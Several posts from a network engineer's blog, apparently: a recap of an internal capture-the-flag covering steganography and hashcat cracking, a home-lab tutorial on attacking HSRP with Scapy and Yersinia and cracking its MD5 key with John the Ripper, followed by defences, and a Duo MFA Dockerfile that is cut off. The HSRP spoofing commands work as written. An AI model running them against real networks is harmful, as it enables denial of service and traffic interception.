Andrew Roderos

Tech Geek

Security

My CTF Experience

by Leave a Comment

Table Of Contents


Our Information Security Office (ISO) hosted its first-ever capture the flag (CTF) event recently during the Cybersecurity & Privacy Festival. The CTF was open to all staff for a whole week from 10/19 – 10/23. It was engaging, educational, exhausting, frustrating, and infuriating. In this post, I want to share my CTF experience. I will also include some information about the challenges and my thought process. Bonus: I incorporated a mini-CTF. I encourage you to try it out!

Before this event, I’ve participated in three CTFs in the past. The first two CTFs I’ve done were back in April 2018. It was during my SANS SEC530 (Defensible Security Architecture and Engineering) training at Louisville, Kentucky.

The first one was the Cyber Defense NetWars. This particular CTF is what I’d say a traditional one since it covers multiple categories. The second CTF was for the SEC530 class itself. The third CTF, hosted by Palo Alto Networks, focused on their Prisma Cloud product, which I’ve never used until that day.

View this post on Instagram

I won a CTF event today!

A post shared by Andrew Roderos (@andrewroderos) on

While this CTF was my fourth one, my CTF experiences varied from one to the other. All four of them had a different set of challenges. However, this CTF has some similarities with SANS NetWars.

CTF experience

There are three common types of CTF: Jeopardy-style, attack-defense, and mixed. Our internal CTF was a Jeopardy-style. This type of CTF usually has multiple categories of challenges. Since the game organizers recognized that participants were coming from various backgrounds (some of which were non-technical), they included privacy and security questions of varying degrees of difficulty.

Cyberfest 2020 Categories

When they opened the CTF site on Monday at noon, there were around 100 challenges. By Tuesday night, the top 3 players ran out of challenges, and I was at the top. We thought we could finally rest from it and enjoy the rest of the festival. We were wrong.

My CTF Experience - First wave of challenges

On Wednesday, the organizers added 20 more challenges. The majority of the challenges were different from the original set. It required more thought and research than the previous ones.

The top 3 players couldn’t answer one of the questions in the password category. Each one of us didn’t want to take the hint, so the organizers decided to give us a freebie.

My CTF Experience - Second wave of challenges

Unfortunately, the notification bell didn’t show me that there was a new message. I had to go to the notification page to see what’s there. By then, I was three hours late. On top of that, I had to install, troubleshoot, and learn how to use GPG Suite. By then, I, unfortunately, lost the lead because whoever gets the highest score first gets the top spot.

CTF Final Score

They didn’t stop there. On Friday morning, they added two more challenges. These two challenges require us to apply the knowledge we gained from one of the workshops. The workshop focused on exploiting vulnerabilities on multiple systems.

CTF Prize

I had mixed feelings about the additional challenges. I know other CTF participants welcomed the extra challenges. My main gripe was the amount of time we had to dedicate if we wanted to win the CTF. Other than that, it was very educational.

Challenges

Unfortunately, I was not permitted to share the real files from the challenges. The next best thing I could do is to try to give you a similar example of the challenges. Since there were a lot of challenges, I will only pick a few of them.

Steganography

I’ve heard of steganography before the CTF. However, I’ve never inspected a file that has a hidden message until last week. It was fun to go through the process of learning how to decipher what’s the secret message. There are several tools that you can use in the area of steganography. I will only cover some of the tools that I’ve encountered to solve the CTF challenges.

Road Untraveled

Road Untravelled Challenge

I believe this challenge is a perfect warmup for the steganography category. It serves as an excellent way to teach someone to gather any data that they can get from the file.

The challenge has a simple question: where does this road go?

Depending on someone’s experience, the CTF player may perform a reverse image search to get a clue where it is. However, some CTFs will never make it that easy.

Since I wasn’t familiar with the tools used in steganography, I had to research the subject. One of the tools I encountered was the ExifTool. Alternatively, you can use this site to view the metadata.

Running the ExifTool is easy. Just issue the exiftool <filename here> syntax, and you will see the metadata, as shown below.

networkjutsu@MacBook-Pro$ exiftool road-untraveled.jpg
ExifTool Version Number         : 12.00
File Name                       : road-untraveled.jpg
Directory                       : .
File Size                       : 209 kB
File Modification Date/Time     : 2020:10:27 19:25:51-07:00
File Access Date/Time           : 2020:10:27 19:29:57-07:00
File Inode Change Date/Time     : 2020:10:27 19:29:56-07:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Color Space                     : sRGB
Exif Image Width                : 1024
Exif Image Height               : 674
GPS Version ID                  : 2.3.0.0
GPS Latitude Ref                : North
GPS Longitude Ref               : West
Current IPTC Digest             : d41d8cd98f00b204e9800998ecf8427e
IPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e
Image Width                     : 1024
Image Height                    : 674
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1024x674
Megapixels                      : 0.690
GPS Latitude                    : 37 deg 48' 43.74" N
GPS Longitude                   : 122 deg 28' 39.80" W
GPS Position                    : 37 deg 48' 43.74" N, 122 deg 28' 39.80" W

To me, the only interesting data here is the GPS information. If you plug that into Google Maps, then you should see the Golden Gate Bridge. That’s the flag for this challenge.

Do you find this content useful? If so, consider buying me a coffee! ☕


Humility

This challenge has a simple task – to find one of my favorite quotes. The hint is: The only true wisdom is in knowing you know nothing.

This challenge was a hard one. I tried using exiftool and other tools, but I wasn’t having any luck. Eventually, I found this site, which helped solve the challenge.

Alternatively, if you can use CyberChef, you can also use that to solve this challenge. However, when an image has three different values for the bit planes, then CyberChef is not the right tool.

Note

If you want to try it yourself, then download it from here. Don’t right-click and save the image because the data won’t be there.

CTF Experience - Challenge - Steganography

The StegOnline tool is easy to use. The hardest part is figuring out which RGB bit plane values you need to solve the challenge.

To use the StegOnline, upload the image, then choose the Extract Files/Data button. From there, you tick a box or more and click the Go button. Look at the ASCII section and inspect anything that may be of value. Some CTF challenges do not require you to decode anything – it will just be in regular text. Take this image, for example.

Using StegOnline

In this case, I encoded it using Base64. There are a lot of online tools out there that can decode it for you. Alternatively, if you are a Mac user, you can use the command line. Use the echo SSBrbm93 IG5vdGhp bmcgZXhj ZXB0IHRo ZSBmYWN0 IG9mIG15 IGlnbm9y YW5jZQ== | base64 --decode syntax to find out the flag. If you’re a Linux user, you may need to remove the spaces.

networkjutsu@MacBook-Pro$ echo `echo SSBrbm93  IG5vdGhp  bmcgZXhj  ZXB0IHRo  ZSBmYWN0  IG9mIG15  IGlnbm9y  YW5jZQ== | base64 --decode`
I know nothing except the fact of my ignorance

networkjutsu@ubuntu$ echo `echo SSBrbm93  IG5vdGhp  bmcgZXhj  ZXB0IHRo  ZSBmYWN0  IG9mIG15  IGlnbm9y  YW5jZQ== | base64 --decode`
base64: invalid input
I know

networkjutsu@ubuntu$ echo `echo SSBrbm93IG5vdGhpbmcgZXhjZXB0IHRoZSBmYWN0IG9mIG15IGlnbm9yYW5jZQ==| base64 --decode`
I know nothing except the fact of my ignorance

As mentioned earlier, you can also use CyberChef. The great thing about using CyberChef is the recipes that you can add, for example, adding From Base64 recipe.

CTF Challenge #1: Fast and expensive car

Experience is the best teacher, so I want any CTF beginner to figure out the flag. Comment your answer below. Check back a few days later to see if your comment gets posted. If it did, then you didn’t answer correctly. If you don’t see your comment, then you answered the challenge correctly.

FYI – This is a relatively easy CTF challenge. You may not experience the same in a real CTF.

Hint

You will incorporate what you’ve learned thus far and also perform additional research about steganography.

Passwords

Before the CTF, I’ve played with two popular password cracking tools in the past: Hashcat and John the Ripper (JtR). In fact, I used JtR in one of my articles. That said, I thought it would be relatively easy with wordlists. I was wrong. It turned out that you only need one wordlist, additional command flags, and some thought.

RockYou

The password section had six challenges. I thought that three of those challenges were related to each other because of the CTF titles. The CTF titles were along the lines of a weak password, still not adequate, and better but still crackable.

I grabbed all the shadow files from these three challenges and copied the ones I needed. I ran hashcat with RockYou wordlist and waited for it to finish. When the cracking process finished, only one password was in the output file.

networkjutsu@MacBook-Pro$ $ cat combined-hash
$5$00000$i8iHSm4kLHOMO0u8nbtpg.4N/t5hgYJBCJ1OFlkk42/
$5$00000$Megnzik.4VtQFweBSkgZqjNGeH5M27UncMuCDOeDK0B
$5$00000$zCy8qKUIqL3RTJooaLxEDATUwYi.h9gvKKyUee039OC

networkjutsu@MacBook-Pro$ hashcat -m 7400 -a 0 -o cracked.txt combined-hash rockyou.txt -O
hashcat (v5.1.0) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 3 digests; 3 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Optimized-Kernel
* Zero-Byte
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 15

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Type........: sha256crypt $5$, SHA256 (Unix)
Hash.Target......: combined-hash
Time.Started.....: Sat Oct 31 09:17:01 2020 (5 mins, 35 secs)
Time.Estimated...: Sat Oct 31 09:22:36 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:     4689 H/s (12.95ms) @ Accel:16 Loops:4 Thr:256 Vec:1
Speed.#3.........:    38154 H/s (2.93ms) @ Accel:64 Loops:16 Thr:256 Vec:1
Speed.#*.........:    42842 H/s
Recovered........: 1/3 (33.33%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 244335/14344384 (1.70%)
Restore.Point....: 13868283/14344384 (96.68%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:4996-5000
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#2....: 0841831213 -> 0805545693
Candidates.#3....: $HEX[2a34657665723732332a] -> $HEX[042a0337c2a156616d6f732103]

Started: Sat Oct 31 09:16:56 2020
Stopped: Sat Oct 31 09:22:38 2020

networkjutsu@MacBook-Pro$ cat cracked.txt
$5$00000$Megnzik.4VtQFweBSkgZqjNGeH5M27UncMuCDOeDK0B:Roja_1587

CTF Challenge #2: Crack the passwords

We’ve cracked one password, and that’s a clue in itself. I suggest you brute force attack the other two passwords. With a better GPU than my Radeon Pro 460 that comes with MacBook Pro 2016, you should be able to crack these two passwords in less than 30 minutes.

Same as CTF challenge #1, comment your answer below. If you come back to my site and do not see your comment, that means you answered it correctly.

Hint

In the interest of time, the two passwords are more than seven characters. Create a custom rule or two. The ones that come with hashcat may take too long.

Final Thoughts

It’s normal to feel intimated by CTF competitions, especially if you’re new to it. I felt the same way during my first CTF at SANS NetWars. However, I still went in there with no expectations to win and just wanted to have fun solving challenges. Guess what? I ended up being on the board and won a coin.

Trust me when I say that you will expand your skillset when you participate in a CTF. Whether you enter as an individual or a team, you will gain knowledge from the competition. Having said that, if you’re new to CTF, I suggest you participate in my mini-CTF.

BUY ME COFFEE ☕

Did you find this content useful? Show your appreciation by buying me a coffee!


Attacking HSRP

by Leave a Comment

Table Of Contents


Back in the day, the Cisco Press books only covered the Hot Standby Router Protocol (HSRP) topic in the professional-level track. When I did a quick search on CCNA books, I found out that they covered it in CCNA R&S ICND2 200-105 OCG* and the new CCNA 200-301 OCG, Vol 2* books. Both books, however, didn’t cover the security vulnerability of such minimal configuration. Thus, attacking HSRP is possible.

This post contains affiliate links. If you use these links to buy something I may earn a commission. Full disclosure here.

The books only discussed the theory behind it, the reason for using it, and implementation steps. While it’s all right to cover only the essentials, it is no longer sufficient to run HSRP without security because of how easy it is to attack it. In this article, I’m going to demonstrate how to perform an attack HSRP and protect it from such attacks.

Related: VMware ESXi Home Lab – Intel NUC 10 (Frost Canyon)

In this demo, I used EVE-NG and Kali Linux on my VMware ESXi home lab environment. If you’re looking for a small form factor server, you may want to consider Intel NUC. This NUC is my second one, and I am a fan of it!

What is HSRP?

HSRP is a Cisco proprietary protocol released around 1998, at least the RFC. It is one of the First Hop Redundancy Protocol (FHRP) supported in Cisco routers and Layer 3 capable switches. Cisco designed the protocol to provide a mechanism for the routers or switches to establish a fault-tolerant default gateway.

In essence, the devices work in concert to provide an illusion of a single default gateway to the hosts within the LAN. In turn, it allows for some fault scenarios and still not lose connectivity to the default gateway.

How does it work?

Note

This section does not cover everything there is to know about the operations of HSRP. For more information, read the RFC 2281.

It is crucial to understand the fundamental operations of HSRP. Understanding how it works is the key to recognizing the protocol’s vulnerability.

A set of HSRP-capable devices that work together are known as an HSRP group or standby group. A single router in a standby group is elected to be responsible for forwarding traffic destined to the default gateway. This router is known as an active router.

Another router will act as the backup router known as a standby router. If the active router fails, the standby router will become the active router.

These HSRP-enabled devices exchange information between each other using hello packets. Both the active and standby routers send the hello messages to the destination multicast address 224.0.0.2 on UDP 1985.

Within a hello packet, there is a field called priority. HSRP uses this field to elect the active and standby routers. A router with the highest priority wins the election. By default, all routers use 100 as their priority. If there is a tie in priority values, the router with the highest IP address configured wins the election.

Configuration and packet capture

Now that you’re familiar with HSRP’s operations, it’s time to look at the basic configuration and the contents of a hello packet. In this demo, I have two routers, one switch, and two computers.

attacking HSRP

Without further ado, I used the following configuration for both routers.

interface GigabitEthernet0/0
 ip address 10.0.0.2 255.255.255.0
 standby 1 ip 10.0.0.1
 standby 1 priority 120
 standby 1 preempt
interface GigabitEthernet0/0
 ip address 10.0.0.3 255.255.255.0
 standby 1 ip 10.0.0.1
 standby 1 priority 120
 standby 1 preempt

Once the routers see each other’s HSRP messages, R1 will take over as the active router. In the packet capture, it shows both hello packets of R1 and R2 after the election process.

You will notice that both routers automatically set authentication data to cisco. By default, Cisco IOS includes this key to authenticate routers that participate in HSRP.

Vulnerability

If you stop and think about the basic operations of HSRP, you will be able to recognize its weakness. In essence, any HSRP-capable device can advertise a high priority value and take over as the active router.

The device can be a legitimate router or a malicious actor wanting to issue a denial of service (DoS) or man-in-the-middle (MITM) attack. As a network professional, it falls under our responsibility to ensure network reliability and protect network devices from attacks.

Exploitation

Now that you are aware of HSRP’s basic operations and vulnerability, you can apply that knowledge to exploit its weakness. There are two open-source software tools that you can use to perform a DoS attack: Scapy and Yersinia. With the help of these tools, attacking HSRP makes it easy for anyone to do.

Scapy

In this section, I’m going to demonstrate how easy it is to attack HSRP with the use of Scapy. In this demo, I’m using Kali Linux with a lot of packages installed. You may need to install the software if you get an error.

I used these parameters below to perform the attack.

networkjutsu@kali$ sudo scapy
>>> ip = IP(src='11.11.11.11',dst='224.0.0.2')
>>> udp = UDP(sport=1985,dport=1985)
>>> hsrp = HSRP(group=1,priority=255,virtualIP='10.0.0.1')
>>> send(ip/udp/hsrp,inter=3,loop=1)
.....^C
Sent 5 packets.

Alternatively, you can write the syntax like the one below.

networkjutsu@kali$ sudo scapy
>>> send(IP(src='11.11.11.11',dst='224.0.0.2')/UDP(sport=1985,dport=1985)/HSRP(group=1,priority=255,virtualIP='10.0.0.1'),inter=3,loop=1)
.....^C
Sent 5 packets.

I think the parameters are self-explanatory except for two: inter and loop. The inter parameter means interval in seconds. Since I set it to 3, Scapy will send the packets every 3 seconds. The loop parameter instructs Scapy to keep sending the same message until I stop it.

Once the routers see packets that I crafted using Scapy, their HSRP states will change, as shown below.

R1#
*Aug 15 20:58:44.595: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -&gt; Speak
*Aug 15 20:58:55.826: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Speak -&gt; Standby
R1#show standby brief
                     P indicates configured to preempt.
                     |
Interface   Grp  Pri P State   Active          Standby         Virtual IP
Gi0/0       1    120 P Standby 11.11.11.11     local           10.0.0.1
R2#
*Aug 15 20:58:43.488: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Standby -&gt; Listen
R2#show standby brief
                     P indicates configured to preempt.
                     |
Interface   Grp  Pri P State   Active          Standby         Virtual IP
Gi0/0       1    100   Listen  11.11.11.11     10.0.0.2        10.0.0.1
Alice> ping 8.8.8.8 -t
84 bytes from 8.8.8.8 icmp_seq=1 ttl=116 time=7.719 ms
84 bytes from 8.8.8.8 icmp_seq=2 ttl=116 time=6.688 ms
84 bytes from 8.8.8.8 icmp_seq=3 ttl=116 time=7.091 ms
84 bytes from 8.8.8.8 icmp_seq=4 ttl=116 time=7.666 ms
84 bytes from 8.8.8.8 icmp_seq=5 ttl=116 time=7.853 ms
84 bytes from 8.8.8.8 icmp_seq=6 ttl=116 time=7.859 ms
8.8.8.8 icmp_seq=7 timeout
8.8.8.8 icmp_seq=8 timeout
8.8.8.8 icmp_seq=9 timeout
8.8.8.8 icmp_seq=10 timeout
8.8.8.8 icmp_seq=11 timeout

The screenshot below is the packet capture during the attack.

If you look at frame #6, that’s when Scapy first sent the crafted HSRP message.

Shortly after seeing the crafted HSRP message, R1 sends a resign message (frame #8). This message means that R1 no longer wishes to be the active router.

Next, the R2 sends a message (frame #9) with a listen state. Yes, Wireshark displays it as passive, but if you read RFC 2281, there is no passive state.

Yersinia

For folks that prefer GUI-based, you can use the Yersinia tool to launch the attack. As with the previous section, I’m using Kali Linux in this demo. You may need to install the software if you get an error.

To launch the Yersinia GUI, type the command sudo yersinia -G in the terminal application. When you start Yersinia, you may see a warning message stating that the GUI is an alpha version. Click the OK button to exit out of the warning message.

To start an HSRP attack, select the Launch attack button, and a new window will appear.

In the Choose protocol attack window, select the HSRP tab. Then, select the becoming ACTIVE router radio button, and select the OK button. A new window will appear.

I tried the other options, but they didn’t work for me. Your mileage may vary.

In the HSRP attack parameters window, enter the source IP that you want. To remain consistent throughout the demo, I will use the same IP address. Once you entered the IP address, select the OK button.

Do you find this content useful? If so, consider buying me a coffee! ☕


As you can see, the HSRP message that the Yersinia tool sent out is different than what we crafted using Scapy. The software sent out a coup message instead of a hello message. You can technically do the same thing with Scapy by adding opcode=1 in the HSRP parameter. Either way, both software successfully launched the attack and took over the active router role.

Another difference is the source MAC address that the Yersinia tool uses for the attack. With Scapy, it uses the MAC address of the NIC or vNIC. I tried crafting it using a different source MAC address, but the attack wasn’t successful.

Protection

Defending from HSRP attacks is quite an easy process. It’s surprising how many HSRP-enabled interfaces I’ve seen that do not have security configuration. The network engineers may view it as low threat compared to how information security professionals may view it. It is no secret that these two camps have different opinions with regards to security. But, I digress.

Access Control List (ACL)

One might think that an ACL is enough to protect from an HSRP attack. However, as you have seen, it’s easy enough to spoof the source IP address. To demonstrate that this isn’t successful in thwarting such an attack, I configured an ACL on both routers.

ip access-list extended HSRP
 permit udp 10.0.0.0 0.0.0.3 eq 1985 host 224.0.0.2 eq 1985
 deny   udp any eq 1985 any eq 1985
 permit ip any any
interface GigabitEthernet0/0
 ip access-group HSRP in

As you can see, I limited the routers to accept HSRP messages only from the 10.0.0.0/30 range. If it receives any HSRP packets from outside this range, then the traffic is dropped. The output below shows that 12 packets matching the deny filter. That’s when I attempted to send crafted HSRP messages using a source IP address of 11.11.11.11.

R1#show ip access-list HSRP
Extended IP access list HSRP
    10 permit udp 10.0.0.0 0.0.0.3 eq 1985 host 224.0.0.2 eq 1985 (603 matches)
    20 deny udp any eq 1985 any eq 1985 (12 matches)
    30 permit ip any any (730 matches)

While the ACL is successful in thwarting the HSRP attack, it’s not, however, enough to protect from such an attack. Let’s use Scapy to spoof the IP of the R2 as the source.

networkjutsu@kali$ sudo scapy
>>> ip = IP(src='10.0.0.3',dst='224.0.0.2')
>>> udp = UDP(sport=1985,dport=1985)
>>> hsrp = HSRP(group=1,priority=255,virtualIP='10.0.0.1')
>>> send(ip/udp/hsrp,inter=3,count=20)
Alice> ping 8.8.8.8 -t
84 bytes from 8.8.8.8 icmp_seq=1 ttl=116 time=7.719 ms
84 bytes from 8.8.8.8 icmp_seq=2 ttl=116 time=6.688 ms
84 bytes from 8.8.8.8 icmp_seq=3 ttl=116 time=7.091 ms
84 bytes from 8.8.8.8 icmp_seq=4 ttl=116 time=7.666 ms
84 bytes from 8.8.8.8 icmp_seq=5 ttl=116 time=7.853 ms
84 bytes from 8.8.8.8 icmp_seq=6 ttl=116 time=7.859 ms
8.8.8.8 icmp_seq=7 timeout
8.8.8.8 icmp_seq=8 timeout
8.8.8.8 icmp_seq=9 timeout
8.8.8.8 icmp_seq=10 timeout
8.8.8.8 icmp_seq=11 timeout
Aug 16 20:50:41.061: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Standby -> Active
*Aug 16 20:51:15.457: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -> Speak
*Aug 16 20:51:15.479: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Speak -> Active
*Aug 16 20:51:18.458: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -> Speak
*Aug 16 20:51:28.828: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Speak -> Standby
R1#sh standby
GigabitEthernet0/0 - Group 1
  State is Standby
    78 state changes, last state change 00:00:51
  Virtual IP address is 10.0.0.1
  Active virtual MAC address is 000c.29dd.94c3
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
    Next hello sent in 2.048 secs
  Preemption enabled
  Active router is 10.0.0.3, priority 255 (expires in 3.456 sec)
  Standby router is local
  Priority 120 (configured 120)
  Group name is "hsrp-Gi0/0-1" (default)
*Aug 16 20:51:15.891: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Standby -> Active
*Aug 16 20:51:15.911: %HSRP-5-STATECHANGE: GigabitEthernet0/0 Grp 1 state Active -> Speak
R2#sho standby
GigabitEthernet0/0 - Group 1
  State is Listen
    14 state changes, last state change 00:00:13
  Virtual IP address is 10.0.0.1
  Active virtual MAC address is unknown
    Local virtual MAC address is 0000.0c07.ac01 (v1 default)
  Hello time 3 sec, hold time 10 sec
  Preemption disabled
  Active router is unknown
  Standby router is 10.0.0.2, priority 120 (expires in 9.520 sec)
  Priority 100 (default 100)
  Group name is "hsrp-Gi0/0-1" (default)

As you can see from the R1 and R2 output, I was able to launch a successful DoS attack on the HSRP group.

Authentication

Using the authentication data field is the right solution to remediate this security vulnerability. As demonstrated, we must not use the cleartext option since it’s quite easy to sniff this information.

Cisco IOS supports two ways of adding MD5 authentication to HSRP: key chain and key string. The advantage of using the key-chain method is that you can rotate the keys without breaking the HSRP communication between two devices.

While the key-chain method allows you to change the cryptographic authentication algorithm, it doesn’t seem to have any effect. When I captured the packets and grabbed the hash value, the hash-identifier tool still recognized it as MD5 or MD4.

Without further ado, here are the two methods on how to add MD5 authentication to HSRP.

key chain HSRP
 key 1
  key-string ranger1960
!
interface GigabitEthernet0/0
 standby 1 authentication md5 key-chain HSRP
interface GigabitEthernet0/0
 standby 1 authentication md5 key-string ranger1960

Authentication attack

I was curious if I can attack HSRP’s authentication without cracking the hash. So, I decided to capture the packets on the wire and copy the hash value. I then decided to use Scapy to craft an HSRP packet using the hash value from the packet capture.

networkjutsu@kali$ sudo scapy
>>> ip = IP(src='11.11.11.11',dst='224.0.0.2')
>>> udp = UDP(sport=1985,dport=1985)
>>> hsrp = HSRP(group=1,priority=255,virtualIP='10.0.0.1',auth=b'x00\x00\x00\x00\x00\x00\x00\x00')
>>> md5 = HSRPmd5(type=4,len=28,algo=1,padding=0,flags=0,sourceip='10.0.0.3',keyid=0,authdigest=b'\xa6\xb9\x55\x4a\xd2\x31\x62\xd8\x9b\x2d\x6b\x9e\xf3\x5f\x25\x76')
>>> send(ip/udp/hsrp/md5,inter=3,count=10)
*Aug 19 01:40:50.183: %HSRP-4-BADAUTH: Bad authentication from 11.11.11.11, group 1, remote state Active
R1#
*Aug 19 01:40:54.319: %HSRP-4-BADAUTH: Bad authentication from 11.11.11.11, group 1, remote state Active
R2#

As you can see, both the R1 and R2 reported that the crafted packet doesn’t match the HSRP key set on both routers. It seems that it is not vulnerable to pass the hash kind of attack.

While I couldn’t take the pass the hash attack kind of approach, MD5 is not immune to attacks. As you may be aware, MD5 is susceptible to collision attacks. Furthermore, there are other types of attacks, as described in this paper. A highly motivated attacker could theoretically perform these attacks.

Brute force attack

As with any hash, MD5 is susceptible to brute force attacks. That said, it is vital to use a strong enough key for authentication to avoid dictionary-based attacks.

I purposefully set the weak key string so that I can demonstrate how easy it is to crack it. Kali Linux has a wordlist that either hashcat or John the Ripper can use.

Related: My CTF Experience – our first-ever internal CTF

The rockyou.txt wordlist included in my installation is quite popular, but it’s not a very big list (134 MB). Other wordlists out there are quite massive. For example, crackstation.net uses a wordlist that amounts to a 15 GB uncompressed text file.

Cracking software

In this demo, I’m going to use one of the popular cracking software tools called John the Ripper (JtR). Depending on the packages that you selected during the Kali Linux installation process, you may not need to install it.

Packet capture

Before you can leverage John the Ripper (JtR), you will need to capture HSRP traffic and save it as a PCAP file. By default, Wireshark saves the file as PCAP Next Generation Dump File format, so make sure to select the right one when saving.

Install packages

Furthermore, you will need to install some software packages before using the software. These packages are required to extract the necessary fields for JtR to crack the hash.

networkjutsu@kali$ sudo apt install python-pip -y
networkjutsu@kali$ sudo pip install wheel
networkjutsu@kali$ sudo pip install scapy
networkjutsu@kali$ sudo pip install --user dpkt

Hash value extraction

Once completed, run the pcap2john.py script against the PCAP file. For each HSRP packets, you will get one hash value. Copy and save the hash value to a text file.

networkjutsu@kali$ sudo /usr/share/john/pcap2john.py md5.pcap
$hsrp$000010030a78010000000000000000000a000001041c010000000a0000020000000000000000000000000000000000000000$a6b9554ad23162d89b2d6b9ef35f2576
$hsrp$000008030a64010000000000000000000a000001041c010000000a0000030000000000000000000000000000000000000000$132833140773d3f3108bfdaa4091a439

Cracking the hash

Now that we have the hash value, it’s time to get cracking (pun intended). In this demo, I stored the hash value in a file called md5.txt.

networkjutsu@kali$ sudo john --format=hsrp Desktop/md5.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (hsrp, "MD5 authentication" HSRP, HSRPv2, VRRP, GLBP [MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
ranger1690      (?)
ranger1690      (?)
2g 0:00:00:00 DONE (2020-08-16 20:10) 200.0g/s 1254Kp/s 2508Kc/s 2508KC/s havana..supreme
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed

As you can see, JtR was able to crack the hash value using a wordlist. It is the reason why you should use a key that isn’t in any of a wordlist. The simplest way is to use a built-in tool in Linux or macOS to generate a key. I use the openssl rand -base64 23 to produce a 32-character key.

Final thoughts

As demonstrated, it is easy to protect HSRP from malicious actors. Yet, there are networks out there running HSRP that do not have this security feature turned on.

I think some network engineers do not believe it poses a real threat to bother securing it. It may be because of the other security controls in place that the threat of such an attack is low.

I, however, believe that it doesn’t cause any real operational burden not to include it. Not only it increases your security posture, but it will also make your security department happy that you are reducing vulnerabilities.

BUY ME COFFEE ☕

Did you find this content useful? Show your appreciation by buying me a coffee!


Disclosure

AndrewRoderos.com is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com.

How to implement Duo Security MFA

by Leave a Comment

If you follow me on Instagram, then you know that I successfully implemented Duo MFA in my home lab. I’ve set up two environments, one with FreeRADIUS, and the other using Windows AD, as the primary authentication source. In today’s article, I’m going to demonstrate how to implement Duo Security MFA with FreeRADIUS as the primary authentication source.

Table Of Contents


Introduction

As you may already know, multi-factor authentication (MFA) isn’t new. Back in the day, the most popular MFA solution is RSA SecurID. Nowadays, one of the popular MFA solutions is Duo. It’s also popular with tech-savvy folks who are looking at deploying two-factor authentication (2FA) in their home lab since they offer free-tier pricing.

I’ve had a 2FA solution in my home lab since 2016. I’ve written a few articles about it. The first article was about adding 2FA when I connect remotely (SSH) to my Ubuntu Linux VMs. The second article was adding 2FA to FreeRADIUS, which gives RADIUS clients a 2FA solution. The third article was adding 2FA to TACACS+ using tac_plus daemon.

What’s needed

In this tutorial, you will need the following:

  • Duo account (sign up for free)
  • Two machines (virtual or physical)

The VM specs will depend on the environment. In my VMware ESXi home lab environment, the Duo VM has the following specs:

  • 1 x vCPU
  • 512MB RAM or more (Recommended is 4GB)
  • 8GB drive space
  • Ubuntu Server 18.04
Related: VMware ESXi Home Lab – Intel NUC 10 (Frost Canyon)

My FreeRADIUS is running on a Docker container. Since I have multiple Docker containers in there, the VM has the following specs:

  • 1 x vCPU
  • 1GB RAM
  • 8GB drive space
  • Ubuntu Server 18.04

FreeRADIUS Docker container

Ever since my first FreeRADIUS 2FA article, I’ve migrated it to a Docker container. That said, it was easy for me to write a new Dockerfile without the Google Authenticator piece.

# Use Base Ubuntu image
FROM ubuntu:18.04

# Author of this Dockerfile
MAINTAINER Andrew Roderos <andrewroderos.com>

# Update & upgrades
RUN apt-get update && apt-get dist-upgrade -y

# Install FreeRADIUS
RUN apt-get install freeradius -y

# Clear local repo
RUN apt-get clean

# Add user to container with home directory
RUN useradd -m -d /home/networkjutsu -s /bin/bash networkjutsu

# Add password to networkjutsu account
RUN echo 'networkjutsu:makemypasswordgreatagain' | chpasswd

# Edit /etc/pam.d/radiusd file
RUN echo "auth required pam_unix.so use_first_pass" >> /etc/pam.d/radiusd

# Edit /etc/freeradius/3.0/mods-config/files/authorize file
# This is the real file for /etc/freeradius/3.0/users
RUN sed -i '1s/^/# Instruct FreeRADIUS to use PAM to authenticate users\n/' /etc/freeradius/3.0/mods-config/files/authorize
RUN sed -i '2s/^/DEFAULT Auth-Type := PAM\n/' /etc/freeradius/3.0/mods-config/files/authorize

# Copy existing /etc/freeradius/sites-available/default file to container
# This is the real file for /etc/freeradius/3.0/sites-enabled/default
COPY default /etc/freeradius/3.0/sites-available/default

# Change owner of the file to freerad
RUN chown freerad:freerad /etc/freeradius/3.0/sites-available/default

# Copy existing /etc/freeradius/clients.conf file to container
